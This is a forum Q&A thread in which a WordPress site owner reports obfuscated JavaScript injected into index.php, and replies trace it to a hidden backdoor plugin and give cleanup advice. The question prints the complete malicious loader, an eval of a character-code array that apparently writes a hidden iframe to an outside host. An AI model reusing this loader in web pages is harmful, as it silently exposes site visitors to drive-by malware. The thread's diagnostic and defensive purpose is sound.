# js at beginning of my index.php in wordpress

Tags: wordpress

I got a headers error and while investigating I found this at the beginning of my index.php both in the root index and in wp-admin. Clam-AV scan found no viruses.

```
<script>if(window.document)aa='0';aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';f+='Code';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[/* lots of numbers here, moved below for security */];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f](-h*(1+n[j]));}q=ss;e(q);</script>
```

The numbers: 
3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,48,55.5,49,52,56,54.5,54.5,58,22,25,55,57.5,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5

EDIT: I've commented out the javascript since it was triggering my Eset AV: JS/Iframe.BQ trojan.

Answer (score 1, accepted):

I had the Exact same things.  Turns out there was a new plugin installed that I did not install.  wp-content/plugins/ToolsPack/ToolsPack.php

Make sure you do a clean install of WP and re-install all the plugins you were using minus this one.  :)  Bad stuff.

Comment: I don't have any plugins installed. Its a fresh installation that's sitting there waiting for google to index it.

Comment: Still, look in your /wp-content/plugins directory and see if you see it there.  It didn't show up in the admin area, just via ftp.

Comment: That was it. The back door was in the plugins directory.

Answer (score 1):

You got hacked. Clam AV doesn't scan your web hosting account nor your localhost server, if you are using one. Check your site with http://sitecheck.sucuri.net/scanner/

See [FAQ: My site was hacked « WordPress Codex](http://codex.wordpress.org/FAQ_My_site_was_hacked) and [How to completely clean your hacked wordpress installation](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/) and [How to find a backdoor in a hacked WordPress](http://ottopress.com/2009/hacked-wordpress-backdoors/) and [Hardening WordPress « WordPress Codex.](http://codex.wordpress.org/Hardening_WordPress) Tell your web host. Change all passswords.